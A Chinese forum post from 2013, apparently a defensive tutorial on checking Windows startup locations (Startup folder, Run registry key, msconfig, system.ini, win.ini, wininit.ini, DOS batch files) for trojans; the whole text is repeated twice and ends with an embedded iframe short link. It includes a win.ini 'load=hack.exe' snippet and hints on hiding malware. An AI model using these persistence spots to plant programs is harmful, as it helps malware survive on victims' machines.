爱护电脑,注意你的windows 启动项
2013/1/11 0:13:00 人气 321 怀旧国机论坛启动项目,就是开机的时候系统会
在前台或者后台运行的程序。当
Windows(操作系统)完成登录过
程,进程表中出现了很多的进程。
Windows在启动的时候,自动加载
了很多程序。许多程序的自启动,
给我们带来了很多方便,这是不争
的事实,但不是每个自启动的程序
对我们都有用;更甚者,也许有病毒
或木马在自启动行列。为此,要给这
些启动项进行安全设置,让其处于比
较安全的位置. 一、具体的位置
是“开始”菜单中的“启动”选项
在硬盘上的位置是:C:\Documents
andSettings\Administrator\“开
始”菜单\程序\启动; 在注册表中
的位置是:
HKEY_CURRENT_USER\Software
\Microsoft\Windows\
CurrentVersion\Run 现在你
可以打开看看里面有没有什么来历
不明的程序存在。 二、
Msconfig Msconfig是
Windows系统中的“系统配置实用
程序”,它管的方面可够宽,包
括:system.ini、win.ini、启动项目
等。同样,里面也是自启动程序非
常喜欢呆的地方! 1.System.ini
首先,在“运行”对话框中输
入“msconfig”启动系统配置实用程
序(下同),找到 system.ini标签,
里面的“shell=……” 就可以用来加载
特殊的程序。如果你的shell=后面
不是默认的explorer.exe,或者说
后面还有一个程序的名字,那你可
要小心了,请仔细检查相应的程序
是否安全! 2.Win.ini 如果
我们想加载一个程序:hack.exe,
那么可以在win。ini中用下面的语
句来实现: [windows]
load=hack.exe
run=hacke.exe 该怎么做,你
应该知道了吧! 3.“启动”项目
系统配置实用程序中的启动标签
和我们上面讲的“启动”文件夹并不
是同一个东西,在系统配置实用程
序中的这个启动项目,是Windows
系统启动项目的集合地。几乎所有
的启动项目都能在这里找到——当
然,经过特殊编程处理的程序可以
通过另外的方法不在这里显示。
打开“启动”标签,“启动项目”中
罗列的是开机启动程序的名称,“命
令”下是具体的程序附加命令,最后
的“位置”就是该程序在注册表中的
相应位置。你可以对可疑的程序进
行详细的路径、命令检查,一旦发
现错误,就可以用下方的“禁用”来
禁止该程序开机时候的加载。
一般来讲,除系统基于硬件部分和
内核部分的系统软件的启动项目
外,其他的启动项目都是可以适当
更改的,包括:杀毒程序、特定防
火墙程序、播放软件、内存管理软
件等。也就是说,启动项目中包含
了所有我们可见程序的列表,你完
全可以通过它来管理你的启动程序!
三、注册表中相应的启动加载项
目 注册表的启动项目是病毒和
木马程序的最爱!非常多病毒木马的
顽固性就是通过注册表来实现的,
所以平常的时候可以下载一个注册
表监视器来监视注册表的改动。特
别是在安装了新软件或者是运行了
新程序的时候,一定不要被程序漂
亮的外表迷惑。一定要看清楚它的
实质是不是木马的伪装外壳或者是
捆绑程序!必要的时候可以根据备份
来恢复注册表,这样的注册表程序
网上很多,这里也就不再详谈了。
我们也可以通过手动的方法来
检查注册表中相应的位置,虽然它
们很多是和上文讲的位置重复,但
是对网络安全来讲,小心永远不嫌
多! 注意同安全、清洁的系统注
册表相应键进行比较,如果发现不
一致的地方,一定要弄清楚它是什
么东西!不要相信写在外面
的“system”、 “windows”、“programfiles”等名称,谁都知道“欲
盖弥彰”的道理。如果经过详细的比
较,可以确定它是不明程序的话,
不要手软,马上删除! 四、
Wininit.ini 我们知道,
Windows的安装程序常常调用这个
程序来实现安装程序后的删除工
作,所以不要小看它,如果在它上
面做手脚的话,可以说是非常隐
蔽、非常完美的! 它在系统盘的
Windows目录下,用记事本打开它
(有时候是wininit.hak文件)可以看
到相应的内容。很明显,我们可以
在里面添加相应的语句来达到修改
系统程序或者是删除程序的目的。
如果是文件关联型木马,可以通过
winint.ini来删除它感染后的原始文
件,从而达到真正隐藏自己!
五、DOS下的战斗 最后,我们
说说DOS下的启动项目加载,
config.sys、auto*.bat、*.bat等文
件都可以用特定的编程方式来实现
加载程序的目的。所以不要以为
DOS就是个过时的东西,好的DOS
下编程往往能达到非常简单、非常
实用的功能! Windows中有自
带的启动文件夹,它是最常见的启
动项目,但很多人却很少注意仔细
检查它。如果把程序装入到这个文
件夹中,系统启动就会自动地加载
相应程序,而且因为它是暴露在外
的,所以非常容易被外在的因素更
改。为此,本教程中的windows启动
项安全设置,显得十分重要,为系统披
上更厚的安全外衣.
在前台或者后台运行的程序。当
Windows(操作系统)完成登录过
程,进程表中出现了很多的进程。
Windows在启动的时候,自动加载
了很多程序。许多程序的自启动,
给我们带来了很多方便,这是不争
的事实,但不是每个自启动的程序
对我们都有用;更甚者,也许有病毒
或木马在自启动行列。为此,要给这
些启动项进行安全设置,让其处于比
较安全的位置. 一、具体的位置
是“开始”菜单中的“启动”选项
在硬盘上的位置是:C:\Documents
andSettings\Administrator\“开
始”菜单\程序\启动; 在注册表中
的位置是:
HKEY_CURRENT_USER\Software
\Microsoft\Windows\
CurrentVersion\Run 现在你
可以打开看看里面有没有什么来历
不明的程序存在。 二、
Msconfig Msconfig是
Windows系统中的“系统配置实用
程序”,它管的方面可够宽,包
括:system.ini、win.ini、启动项目
等。同样,里面也是自启动程序非
常喜欢呆的地方! 1.System.ini
首先,在“运行”对话框中输
入“msconfig”启动系统配置实用程
序(下同),找到 system.ini标签,
里面的“shell=……” 就可以用来加载
特殊的程序。如果你的shell=后面
不是默认的explorer.exe,或者说
后面还有一个程序的名字,那你可
要小心了,请仔细检查相应的程序
是否安全! 2.Win.ini 如果
我们想加载一个程序:hack.exe,
那么可以在win。ini中用下面的语
句来实现: [windows]
load=hack.exe
run=hacke.exe 该怎么做,你
应该知道了吧! 3.“启动”项目
系统配置实用程序中的启动标签
和我们上面讲的“启动”文件夹并不
是同一个东西,在系统配置实用程
序中的这个启动项目,是Windows
系统启动项目的集合地。几乎所有
的启动项目都能在这里找到——当
然,经过特殊编程处理的程序可以
通过另外的方法不在这里显示。
打开“启动”标签,“启动项目”中
罗列的是开机启动程序的名称,“命
令”下是具体的程序附加命令,最后
的“位置”就是该程序在注册表中的
相应位置。你可以对可疑的程序进
行详细的路径、命令检查,一旦发
现错误,就可以用下方的“禁用”来
禁止该程序开机时候的加载。
一般来讲,除系统基于硬件部分和
内核部分的系统软件的启动项目
外,其他的启动项目都是可以适当
更改的,包括:杀毒程序、特定防
火墙程序、播放软件、内存管理软
件等。也就是说,启动项目中包含
了所有我们可见程序的列表,你完
全可以通过它来管理你的启动程序!
三、注册表中相应的启动加载项
目 注册表的启动项目是病毒和
木马程序的最爱!非常多病毒木马的
顽固性就是通过注册表来实现的,
所以平常的时候可以下载一个注册
表监视器来监视注册表的改动。特
别是在安装了新软件或者是运行了
新程序的时候,一定不要被程序漂
亮的外表迷惑。一定要看清楚它的
实质是不是木马的伪装外壳或者是
捆绑程序!必要的时候可以根据备份
来恢复注册表,这样的注册表程序
网上很多,这里也就不再详谈了。
我们也可以通过手动的方法来
检查注册表中相应的位置,虽然它
们很多是和上文讲的位置重复,但
是对网络安全来讲,小心永远不嫌
多! 注意同安全、清洁的系统注
册表相应键进行比较,如果发现不
一致的地方,一定要弄清楚它是什
么东西!不要相信写在外面
的“system”、 “windows”、“programfiles”等名称,谁都知道“欲
盖弥彰”的道理。如果经过详细的比
较,可以确定它是不明程序的话,
不要手软,马上删除! 四、
Wininit.ini 我们知道,
Windows的安装程序常常调用这个
程序来实现安装程序后的删除工
作,所以不要小看它,如果在它上
面做手脚的话,可以说是非常隐
蔽、非常完美的! 它在系统盘的
Windows目录下,用记事本打开它
(有时候是wininit.hak文件)可以看
到相应的内容。很明显,我们可以
在里面添加相应的语句来达到修改
系统程序或者是删除程序的目的。
如果是文件关联型木马,可以通过
winint.ini来删除它感染后的原始文
件,从而达到真正隐藏自己!
五、DOS下的战斗 最后,我们
说说DOS下的启动项目加载,
config.sys、auto*.bat、*.bat等文
件都可以用特定的编程方式来实现
加载程序的目的。所以不要以为
DOS就是个过时的东西,好的DOS
下编程往往能达到非常简单、非常
实用的功能! Windows中有自
带的启动文件夹,它是最常见的启
动项目,但很多人却很少注意仔细
检查它。如果把程序装入到这个文
件夹中,系统启动就会自动地加载
相应程序,而且因为它是暴露在外
的,所以非常容易被外在的因素更
改。为此,本教程中的windows启动
项安全设置,显得十分重要,为系统披
上更厚的安全外衣.
[iframe=2*2]http://url.cn/FLfTXA[/iframe]
暂无回复!
发表回复